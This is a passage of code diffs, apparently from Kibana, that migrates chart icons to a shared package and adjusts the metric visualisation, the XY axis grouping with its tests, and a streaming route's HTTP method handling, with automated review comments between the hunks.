'GET': + httpRouter.get(routeDefinition, routeHandler); + break; + case 'POST': + httpRouter.post(routeDefinition, routeHandler); + break; + case 'PUT': + httpRouter.put(routeDefinition, routeHandler); + break; + case 'DELETE': + httpRouter.delete(routeDefinition, routeHandler); + break; + default: + throw new Error(`Handler for method ${method} is not defined`); + } }; private addBatchProcessingRoute = 
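Review bot: The new `method` parameter allows `GET` registrations, but `routeDefinition` still declares `body: schema.any()` for every method and `routeHandler` passes `request.body` to `getResponseStream` unchanged, so a GET route validates a body that cannot exist and streams with `data === undefined`. Consider building the validator per method, e.g. `validate: { ...(method !== 'GET' && { body: schema.any() }), query: schema.object({ compress: schema.boolean({ defaultValue: false }) }) }`, and stating on `addStreamingResponseRoute` in `BfetchServerSetup` that GET handlers must take their input from `request.query` or `context` rather than `data`. The `pluginRouter` argument registers the route on another plugin's router, so the route inherits that router's prefix and whatever access settings it carries; a TSDoc line on the interface saying so would help callers reason about where the endpoint ends up. The enclosing class continues outside the hunk.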
diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx b/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx index 232b522838b8e..b75d613f814a7 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx +++ b/src/plugins/chart_expressions/expression_gauge/public/components/gauge_component.tsx @@ -21,7 +21,6 @@ import { } from '../../common'; import { getAccessorsFromArgs, - getIcons, getMaxValue, getMinValue, getValueFromAccessor, @@ -29,6 +28,7 @@ import { getGoalConfig, computeMinMax, } from './utils'; +import { getIcons } from './utils/icons'; import './index.scss'; import { GaugeCentralMajorMode } from '../../common/types'; import { isBulletShape, isRoundShape } from '../../common/utils'; diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts b/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts index 734c64d579da3..33d8427892392 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts +++ b/src/plugins/chart_expressions/expression_gauge/public/components/utils/icons.ts @@ -6,13 +6,13 @@ * Side Public License, v 1. */ +import { IconChartHorizontalBullet, IconChartVerticalBullet } from '@kbn/chart-icons'; import { GaugeShape, GaugeShapes } from '../../../common'; -import { HorizontalBulletIcon } from '../icons'; export const getIcons = (type: GaugeShape) => ({ - [GaugeShapes.HORIZONTAL_BULLET]: HorizontalBulletIcon, - [GaugeShapes.VERTICAL_BULLET]: HorizontalBulletIcon, + [GaugeShapes.HORIZONTAL_BULLET]: IconChartHorizontalBullet, + [GaugeShapes.VERTICAL_BULLET]: IconChartVerticalBullet, [GaugeShapes.ARC]: 'visGoal', [GaugeShapes.CIRCLE]: 'visGoal', }[type]); 
diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts b/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts index 87f6a520ff9eb..639c2a7821b55 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts +++ b/src/plugins/chart_expressions/expression_gauge/public/components/utils/index.ts @@ -7,7 +7,6 @@ */ export * from './accessors'; -export * from './icons'; export * from './gauge_types'; export * from './goal_config'; diff --git a/src/plugins/chart_expressions/expression_gauge/public/index.ts b/src/plugins/chart_expressions/expression_gauge/public/index.ts index 6f9924759e4c4..fc40382a8702a 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/index.ts +++ b/src/plugins/chart_expressions/expression_gauge/public/index.ts @@ -13,4 +13,3 @@ export function plugin() { } export { getGoalValue, getMaxValue, getMinValue, getValueFromAccessor } from './components/utils'; -export { VerticalBulletIcon, HorizontalBulletIcon } from './components/icons'; diff --git a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx b/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx index 35a3d54fe58c0..f2db5a25ff429 100644 --- a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx +++ b/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_component.tsx @@ -35,6 +35,7 @@ import { LegendSizeToPixels, } from '@kbn/visualizations-plugin/common/constants'; import { DatatableColumn } from '@kbn/expressions-plugin/public'; +import { IconChartHeatmap } from '@kbn/chart-icons'; import type { HeatmapRenderProps, FilterEvent, BrushEvent } from '../../common'; import { applyPaletteParams, 
@@ -47,7 +48,6 @@ import { LegendColorPickerWrapper, } from '../utils/get_color_picker'; import { defaultPaletteParams } from '../constants'; -import { HeatmapIcon } from './heatmap_icon'; import './index.scss'; declare global { @@ -366,7 +366,7 @@ export const HeatmapComponent: FC = memo( ); if (!chartData || !chartData.length) { - return ; + return ; } if (!yAxisColumn) { @@ -567,7 +567,9 @@ export const HeatmapComponent: FC = memo( } + noResults={ + + } onElementClick={interactive ? (onElementClick as ElementClickListener) : undefined} showLegend={showLegend ?? args.legend.isVisible} legendPosition={args.legend.position} diff --git a/src/plugins/chart_expressions/expression_heatmap/public/index.ts b/src/plugins/chart_expressions/expression_heatmap/public/index.ts index f6aa926a8fef2..fbbf8027eb343 100644 --- a/src/plugins/chart_expressions/expression_heatmap/public/index.ts +++ b/src/plugins/chart_expressions/expression_heatmap/public/index.ts @@ -11,5 +11,3 @@ import { ExpressionHeatmapPlugin } from './plugin'; export function plugin() { return new ExpressionHeatmapPlugin(); } - -export { HeatmapIcon } from './components/heatmap_icon'; diff --git a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx index 31a12f702ae2a..fd0fbac29ae91 100644 --- a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx +++ b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.test.tsx 
@@ -253,7 +253,7 @@ describe('MetricVisComponent', function () { } `); }); - it('should display subtitle and secondary prefix', () => { + it('should display subtitle', () => { const component = shallow( , - "subtitle": "subtitle", - "title": "Median products.base_price", - "value": 28.984375, - "valueFormatter": [Function], - } - `); }); it('should display secondary metric', () => { - const component = shallow( - + const getMetricConfig = (localConfig: MetricVisComponentProps['config']) => + shallow() + .find(Metric) + .props().data![0][0]!; + + const configNoPrefix = getMetricConfig({ + ...config, + metric: { ...config.metric, subtitle: 'subtitle', secondaryPrefix: undefined }, + dimensions: { ...config.dimensions, secondaryMetric: minPriceColumnId }, + }); + + expect(configNoPrefix!.extra).toEqual( + + {table.columns.find((col) => col.id === minPriceColumnId)!.name} + {' ' + 13.63} + ); - const [[visConfig]] = component.find(Metric).props().data!; + const configWithPrefix = getMetricConfig({ + ...config, + metric: { ...config.metric, subtitle: 'subtitle', secondaryPrefix: 'secondary prefix' }, + dimensions: { ...config.dimensions, secondaryMetric: minPriceColumnId }, + }); - expect(visConfig!.extra).toEqual( + expect(configWithPrefix!.extra).toEqual( {'secondary prefix'} {' ' + 13.63} ); - expect(visConfig).toMatchInlineSnapshot(` + expect(configWithPrefix).toMatchInlineSnapshot(` Object { "color": "#f5f7fa", "extra": @@ -754,6 +753,7 @@ describe('MetricVisComponent', function () { /> ) .find('div') + .at(0) .props() as HtmlAttributes & { css: { styles: string } } ).css.styles; @@ -763,6 +763,7 @@ describe('MetricVisComponent', function () { width: 100%; max-height: 100%; max-width: 100%; + overflow-y: auto; " `); @@ -772,6 +773,7 @@ describe('MetricVisComponent', function () { width: 300px; max-height: 100%; max-width: 100%; + overflow-y: auto; " `); 
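Review bot: `configNoPrefix!.extra` and `configWithPrefix!.extra` carry non-null assertions that are already redundant, because `getMetricConfig` ends in `.props().data![0][0]!` and therefore returns a non-nullable value; drop the trailing `!` at both `expect` call sites so the narrowing lives in one place, as the removed `const [[visConfig]] = ...` form had it. The helper's `localConfig: MetricVisComponentProps['config']` parameter is well typed, but a one-line comment such as `// renders once and returns the config handed to the first Metric tile` would tell readers what the `[0][0]` indexing selects. The surrounding describe block starts and ends outside the hunk.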
@@ -781,6 +783,7 @@ describe('MetricVisComponent', function () { width: 1000px; max-height: 100%; max-width: 100%; + overflow-y: auto; " `); }); diff --git a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx index 94fd86ea43daa..ef091c5245901 100644 --- a/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx +++ b/src/plugins/chart_expressions/expression_metric/public/components/metric_vis.tsx @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import React, { useCallback, useEffect, useRef } from 'react'; +import React, { useCallback, useEffect, useRef, useState } from 'react'; import numeral from '@elastic/numeral'; import { i18n } from '@kbn/i18n'; @@ -34,6 +34,7 @@ import type { FieldFormatConvertFunction } from '@kbn/field-formats-plugin/commo import { CUSTOM_PALETTE } from '@kbn/coloring'; import { css } from '@emotion/react'; import { euiThemeVars } from '@kbn/ui-theme'; +import { useResizeObserver } from '@elastic/eui'; import { VisParams } from '../../common'; import { getPaletteService, @@ -243,6 +244,7 @@ export const MetricVis = ({ ? formatBreakdownValue(row[breakdownByColumn.id]) : primaryMetricColumn.name; const subtitle = breakdownByColumn ? primaryMetricColumn.name : config.metric.subtitle; + const secondaryPrefix = config.metric.secondaryPrefix ?? secondaryMetricColumn?.name; return { value, valueFormatter: formatPrimaryMetric, @@ -250,9 +252,9 @@ export const MetricVis = ({ subtitle, extra: ( - {config.metric.secondaryPrefix} + {secondaryPrefix} {secondaryMetricColumn - ? `${config.metric.secondaryPrefix ? ' ' : ''}${formatSecondaryMetric!( + ? `${secondaryPrefix ? ' ' : ''}${formatSecondaryMetric!( row[secondaryMetricColumn.id] )}` : undefined} 
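Review bot: `config.metric.secondaryPrefix ?? secondaryMetricColumn?.name` falls back to the column name only when the prefix is `null`/`undefined`, so an explicitly empty string configured as the prefix suppresses both the prefix and the fallback, whereas `||` would substitute the column name; whichever is intended, pin it with a comment on that line, e.g. `// an explicitly empty prefix hides the secondary label; only an unset prefix falls back to the column name`. The rewritten test in metric_vis.test.tsx exercises only `secondaryPrefix: undefined` and `'secondary prefix'`, so the empty-string case is untested. The same `secondaryPrefix` drives the `' '` separator in the next hunk, so an empty prefix also drops the leading space, which is consistent with that reading. The enclosing `MetricVis` component starts and ends outside these hunks.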
@@ -307,6 +309,20 @@ export const MetricVis = ({ pixelWidth = grid[0]?.length * maxTileSideLength; } + const [scrollChildHeight, setScrollChildHeight] = useState('100%'); + const scrollContainerRef = useRef(null); + const scrollDimensions = useResizeObserver(scrollContainerRef.current); + + useEffect(() => { + const minTileHeight = 64; // TODO - magic number from the @elastic/charts side. would be nice to deduplicate + const minimumRequiredVerticalSpace = minTileHeight * grid.length; + setScrollChildHeight( + (scrollDimensions.height ?? -Infinity) > minimumRequiredVerticalSpace + ? '100%' + : `${minimumRequiredVerticalSpace}px` + ); + }, [grid.length, scrollDimensions.height]); + // force chart to re-render to circumvent a charts bug const magicKey = useRef(0); useEffect(() => { @@ -315,45 +331,53 @@ export const MetricVis = ({ return (
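Review bot: `useResizeObserver(scrollContainerRef.current)` reads the ref during render, so on the first render it is handed `null`; because assigning `ref.current` does not cause a re-render, the observer is presumably only attached once some other state change re-renders the component, and until then `scrollDimensions.height` stays undefined and the effect picks the pixel height through the `-Infinity` fallback. Holding the element in state with a callback ref — `const [scrollContainer, setScrollContainer] = useState<HTMLDivElement | null>(null);` passed as `ref={setScrollContainer}` with `useResizeObserver(scrollContainer)` — attaches the observer as soon as the element mounts. The `-Infinity` fallback is a sensible default but deserves a comment, e.g. `// no measurement yet: reserve the minimum height so tiles are never squashed`. The `ref` wiring presumably sits in the JSX hunk below, which the extraction has stripped, and the enclosing `MetricVis` component starts and ends outside this hunk.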
- - + + { - if (!filterable) { - return; - } - events.forEach((event) => { - if (isMetricElementEvent(event)) { - const colIdx = breakdownByColumn - ? data.columns.findIndex((col) => col === breakdownByColumn) - : data.columns.findIndex((col) => col === primaryMetricColumn); - const rowLength = grid[0].length; - fireEvent( - buildFilterEvent(event.rowIndex * rowLength + event.columnIndex, colIdx, data) - ); + chartTheme, + ]} + onRenderChange={onRenderChange} + onElementClick={(events) => { + if (!filterable) { + return; } - }); - }} - /> - - + events.forEach((event) => { + if (isMetricElementEvent(event)) { + const colIdx = breakdownByColumn + ? data.columns.findIndex((col) => col === breakdownByColumn) + : data.columns.findIndex((col) => col === primaryMetricColumn); + const rowLength = grid[0].length; + fireEvent( + buildFilterEvent(event.rowIndex * rowLength + event.columnIndex, colIdx, data) + ); + } + }); + }} + /> + + +
); }; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/donut.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/donut.tsx deleted file mode 100644 index 3101164bfe88d..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/donut.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const DonutIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? {title} : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/index.ts b/src/plugins/chart_expressions/expression_partition_vis/public/icons/index.ts deleted file mode 100644 index e61bd6557d581..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/index.ts +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { PieIcon } from './pie'; -export { DonutIcon } from './donut'; -export { TreemapIcon } from './treemap'; -export { MosaicIcon } from './mosaic'; -export { WaffleIcon } from './waffle'; 
diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/mosaic.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/mosaic.tsx deleted file mode 100644 index 1f5c99702f869..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/mosaic.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const MosaicIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/pie.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/pie.tsx deleted file mode 100644 index 5824b8f40b6e6..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/pie.tsx +++ /dev/null 
@@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const PieIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? {title} : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/treemap.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/treemap.tsx deleted file mode 100644 index 781b79505384d..0000000000000 --- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/treemap.tsx +++ /dev/null @@ -1,41 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const TreemapIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? {title} : null} - - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/icons/waffle.tsx b/src/plugins/chart_expressions/expression_partition_vis/public/icons/waffle.tsx deleted file mode 100644 index 21e26facd8e15..0000000000000 
--- a/src/plugins/chart_expressions/expression_partition_vis/public/icons/waffle.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const WaffleIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); - - return ( - - {title ? : null} - - - - ); -}; diff --git a/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts b/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts index cac282553af11..d8b5ad858d764 100644 --- a/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts +++ b/src/plugins/chart_expressions/expression_partition_vis/public/utils/get_icon.ts @@ -6,14 +6,20 @@ * Side Public License, v 1. */ +import { + IconChartWaffle, + IconChartMosaic, + IconChartPie, + IconChartDonut, + IconChartTreemap, +} from '@kbn/chart-icons'; import { ChartTypes } from '../../common/types'; -import { PieIcon, DonutIcon, TreemapIcon, MosaicIcon, WaffleIcon } from '../icons'; export const getIcon = (chart: ChartTypes) => ({ - [ChartTypes.PIE]: PieIcon, - [ChartTypes.DONUT]: DonutIcon, - [ChartTypes.TREEMAP]: TreemapIcon, - [ChartTypes.MOSAIC]: MosaicIcon, - [ChartTypes.WAFFLE]: WaffleIcon, + [ChartTypes.PIE]: IconChartPie, + [ChartTypes.DONUT]: IconChartDonut, + [ChartTypes.TREEMAP]: IconChartTreemap, + [ChartTypes.MOSAIC]: IconChartMosaic, + [ChartTypes.WAFFLE]: IconChartWaffle, }[chart]); 
diff --git a/src/plugins/chart_expressions/expression_xy/common/index.ts b/src/plugins/chart_expressions/expression_xy/common/index.ts
index d9c415f488839..da4c969f47a0c 100755
--- a/src/plugins/chart_expressions/expression_xy/common/index.ts
+++ b/src/plugins/chart_expressions/expression_xy/common/index.ts
@@ -47,6 +47,7 @@ export type {
 ReferenceLineLayerArgs,
 CommonXYDataLayerConfig,
 ReferenceLineLayerConfig,
+ DataDecorationConfigResult,
 AvailableReferenceLineIcon,
 XYExtendedLayerConfigResult,
 CommonXYAnnotationLayerConfig,
diff --git a/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts b/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts
index bb4acd7fa50de..4f4d8aeb69959 100644
--- a/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts
+++ b/src/plugins/chart_expressions/expression_xy/public/definitions/visualizations.ts
@@ -6,30 +6,33 @@ * Side Public License, v 1. */ -import { SeriesTypes } from '../../common/constants'; import { - BarIcon, - LineIcon, - AreaIcon, - BarStackedIcon, - AreaStackedIcon, - BarHorizontalIcon, - BarPercentageIcon, - AreaPercentageIcon, - BarHorizontalStackedIcon, - BarHorizontalPercentageIcon, -} from '../icons'; + IconChartBarHorizontalPercentage, + IconChartBarHorizontalStacked, + IconChartBarPercentage, + IconChartBarHorizontal, + IconChartAreaStacked, + IconChartBarStacked, + IconChartLine, + IconChartBar, + IconChartArea, + IconChartAreaPercentage, +} from '@kbn/chart-icons'; +import { SeriesTypes } from '../../common/constants'; export const visualizationDefinitions = [ - { id: SeriesTypes.BAR, icon: BarIcon }, - { id: `${SeriesTypes.BAR}_stacked`, icon: BarStackedIcon }, - { id: `${SeriesTypes.BAR}_horizontal`, icon: BarHorizontalIcon }, - { id: `${SeriesTypes.BAR}_percentage_stacked`, icon: BarPercentageIcon }, - { id: `${SeriesTypes.BAR}_horizontal_stacked`, icon: BarHorizontalStackedIcon }, - { id: `${SeriesTypes.BAR}_horizontal_percentage_stacked`, icon: BarHorizontalPercentageIcon }, - { id: SeriesTypes.LINE, icon: LineIcon }, - { id: `${SeriesTypes.LINE}_stacked`, icon: LineIcon }, - { id: SeriesTypes.AREA, icon: AreaIcon }, - { id: `${SeriesTypes.AREA}_stacked`, icon: AreaStackedIcon }, - { id: `${SeriesTypes.AREA}_percentage_stacked`, icon: AreaPercentageIcon }, + { id: SeriesTypes.BAR, icon: IconChartBar }, + { id: `${SeriesTypes.BAR}_stacked`, icon: IconChartBarStacked }, + { id: `${SeriesTypes.BAR}_horizontal`, icon: IconChartBarHorizontal }, + { id: `${SeriesTypes.BAR}_percentage_stacked`, icon: IconChartBarPercentage }, + { id: `${SeriesTypes.BAR}_horizontal_stacked`, icon: IconChartBarHorizontalStacked }, + { + id: `${SeriesTypes.BAR}_horizontal_percentage_stacked`, + icon: IconChartBarHorizontalPercentage, + }, + { id: `${SeriesTypes.LINE}_stacked`, icon: IconChartLine }, + { id: SeriesTypes.LINE, icon: IconChartLine }, + { id: 
SeriesTypes.AREA, icon: IconChartArea }, + { id: `${SeriesTypes.AREA}_stacked`, icon: IconChartAreaStacked }, + { id: `${SeriesTypes.AREA}_percentage_stacked`, icon: IconChartAreaPercentage }, ]; diff --git a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts index 35019d75e0554..183a798056edb 100644 --- a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts +++ b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts @@ -7,7 +7,7 @@ */ import { FieldFormat } from '@kbn/field-formats-plugin/common'; -import { DataLayerConfig, YAxisConfigResult } from '../../common'; +import { DataLayerConfig, YAxisConfigResult, DataDecorationConfigResult } from '../../common'; import { LayerTypes } from '../../common/constants'; import { Datatable } from '@kbn/expressions-plugin/public'; import { getAxesConfiguration } from './axes_configuration'; @@ -218,6 +218,20 @@ describe('axes_configuration', () => { params: { id: 'currency' }, }, }, + { + id: 'yAccessorId5', + name: 'Other column', + meta: { + type: 'number', + source: 'esaggs', + index: 'indexPatternId', + sourceParams: { + indexPatternId: 'indexPatternId', + type: 'count', + }, + params: { id: 'number' }, + }, + }, ], }, }; @@ -228,6 +242,11 @@ describe('axes_configuration', () => { position: 'right', type: 'yAxisConfig', }, + { + id: '2', + position: 'left', + type: 'yAxisConfig', + }, ]; const sampleLayer: DataLayerConfig = { @@ -256,6 +275,7 @@ describe('axes_configuration', () => { yAccessorId: { id: 'number', params: {} }, yAccessorId3: { id: 'currency', params: {} }, yAccessorId4: { id: 'currency', params: {} }, + yAccessorId5: { id: 'number', params: {} }, }, splitSeriesAccessors: { d: { format: { id: 'number', params: {} }, formatter: {} as FieldFormat }, 
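Review bot: The `_stacked` line entry now precedes the plain `SeriesTypes.LINE` entry, which reverses the order the removed lines had; if `visualizationDefinitions` feeds an ordered UI list this is a visible reorder unrelated to the icon migration, and if it is only looked up by `id` the reorder is harmless but still widens the diff beyond its stated intent. Restoring the previous order means swapping those two lines so `{ id: SeriesTypes.LINE, icon: IconChartLine },` comes first, matching how the BAR and AREA groups list the base type before its variants. The `@kbn/chart-icons` import list is in no discernible order either; sorting it would make future additions easier to review.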
@@ -269,11 +289,35 @@ describe('axes_configuration', () => { const formatFactory = jest.fn(); const groups = getAxesConfiguration([sampleLayer], false, formatFactory, fieldFormats, []); expect(groups.length).toEqual(1); + expect(groups[0].groupId).toEqual('left'); expect(groups[0].position).toEqual('left'); expect(groups[0].series[0].accessor).toEqual('yAccessorId'); expect(groups[0].series[0].layer).toEqual('first'); }); + it('should map auto series to defined left axis if formatters match', () => { + const formatFactory = jest.fn(); + const groups = getAxesConfiguration( + [ + { + ...sampleLayer, + accessors: ['yAccessorId', 'yAccessorId5'], + decorations: [{ type: 'dataDecorationConfig', forAccessor: 'yAccessorId', axisId: '2' }], + }, + ], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); + expect(groups.length).toEqual(1); + expect(groups[0].groupId).toEqual('axis-2'); + expect(groups[0].position).toEqual('left'); + expect(groups[0].series[0].accessor).toEqual('yAccessorId'); + expect(groups[0].series[1].accessor).toEqual('yAccessorId5'); + expect(groups[0].series[0].layer).toEqual('first'); + }); + it('should map auto series to right axis if formatters do not match', () => { const formatFactory = jest.fn(); const twoSeriesLayer = { ...sampleLayer, accessors: ['yAccessorId', 'yAccessorId2'] }; 
@@ -285,13 +329,72 @@ describe('axes_configuration', () => { expect(groups[1].series[0].accessor).toEqual('yAccessorId2'); }); - it('should map auto series to left if left and right are already filled with non-matching series', () => { + it('should map auto series to left axis if formatters do not match with defined left axis', () => { + const formatFactory = jest.fn(); + const groups = getAxesConfiguration( + [ + { + ...sampleLayer, + accessors: ['yAccessorId', 'yAccessorId3'], + decorations: [{ type: 'dataDecorationConfig', forAccessor: 'yAccessorId', axisId: '2' }], + }, + ], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); + expect(groups.length).toEqual(2); + expect(groups[0].groupId).toEqual('axis-2'); + expect(groups[0].position).toEqual('left'); + expect(groups[0].series[0].accessor).toEqual('yAccessorId'); + expect(groups[0].series[0].layer).toEqual('first'); + expect(groups[1].groupId).toEqual('right'); + expect(groups[1].position).toEqual('right'); + expect(groups[1].series[0].accessor).toEqual('yAccessorId3'); + expect(groups[1].series[0].layer).toEqual('first'); + }); + + it('should map auto series to defined left axis if defined left and right are already filled with non-matching series', () => { + const formatFactory = jest.fn(); + const threeSeriesLayer = { + ...sampleLayer, + accessors: ['yAccessorId', 'yAccessorId2', 'yAccessorId3'], + decorations: [ + { type: 'dataDecorationConfig', forAccessor: 'yAccessorId', axisId: '1' }, + { type: 'dataDecorationConfig', forAccessor: 'yAccessorId2', axisId: '2' }, + ] as DataDecorationConfigResult[], + }; + const groups = getAxesConfiguration( + [threeSeriesLayer], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); + expect(groups.length).toEqual(2); + expect(groups[0].groupId).toEqual('axis-1'); + expect(groups[0].position).toEqual('right'); + expect(groups[1].groupId).toEqual('axis-2'); + expect(groups[1].position).toEqual('left'); + 
expect(groups[0].series[0].accessor).toEqual('yAccessorId'); + expect(groups[1].series[0].accessor).toEqual('yAccessorId2'); + expect(groups[1].series[1].accessor).toEqual('yAccessorId3'); + }); + + it('should map auto series to left if not-defined left and right are already filled with non-matching series', () => { const formatFactory = jest.fn(); const threeSeriesLayer = { ...sampleLayer, accessors: ['yAccessorId', 'yAccessorId2', 'yAccessorId3'], }; - const groups = getAxesConfiguration([threeSeriesLayer], false, formatFactory, fieldFormats, []); + const groups = getAxesConfiguration( + [threeSeriesLayer], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); expect(groups.length).toEqual(2); expect(groups[0].position).toEqual('left'); expect(groups[1].position).toEqual('right'); diff --git a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts index f95423ea83854..7f9f6c49824b8 100644 --- a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts +++ b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts @@ -113,8 +113,13 @@ export function groupAxesByType( const tablesExist = layers.filter(({ table }) => Boolean(table)).length > 0; - leftSeriesKeys.push(LEFT_GLOBAL_AXIS_ID); - rightSeriesKeys.push(RIGHT_GLOBAL_AXIS_ID); + if (!leftSeriesKeys.length) { + leftSeriesKeys.push(LEFT_GLOBAL_AXIS_ID); + } + + if (!rightSeriesKeys.length) { + rightSeriesKeys.push(RIGHT_GLOBAL_AXIS_ID); + } series.auto.forEach((currentSeries) => { const leftAxisGroupId = tablesExist 
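Review bot: `] as DataDecorationConfigResult[]` on `threeSeriesLayer.decorations` is an assertion that would silently accept a malformed decoration; the file already types its fixture as `const sampleLayer: DataLayerConfig`, so declaring `const threeSeriesLayer: DataLayerConfig = { ...sampleLayer, ... }` keeps `type: 'dataDecorationConfig'` narrow with real checking and makes the `DataDecorationConfigResult` import added in the earlier hunk unnecessary. The two inline layers passed directly to `getAxesConfiguration` in the preceding tests need no cast because they are contextually typed by the parameter, which is why only this one differs. This assumes `DataLayerConfig['decorations']` accepts the same shape, which the inline cases suggest but the hunk does not show.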
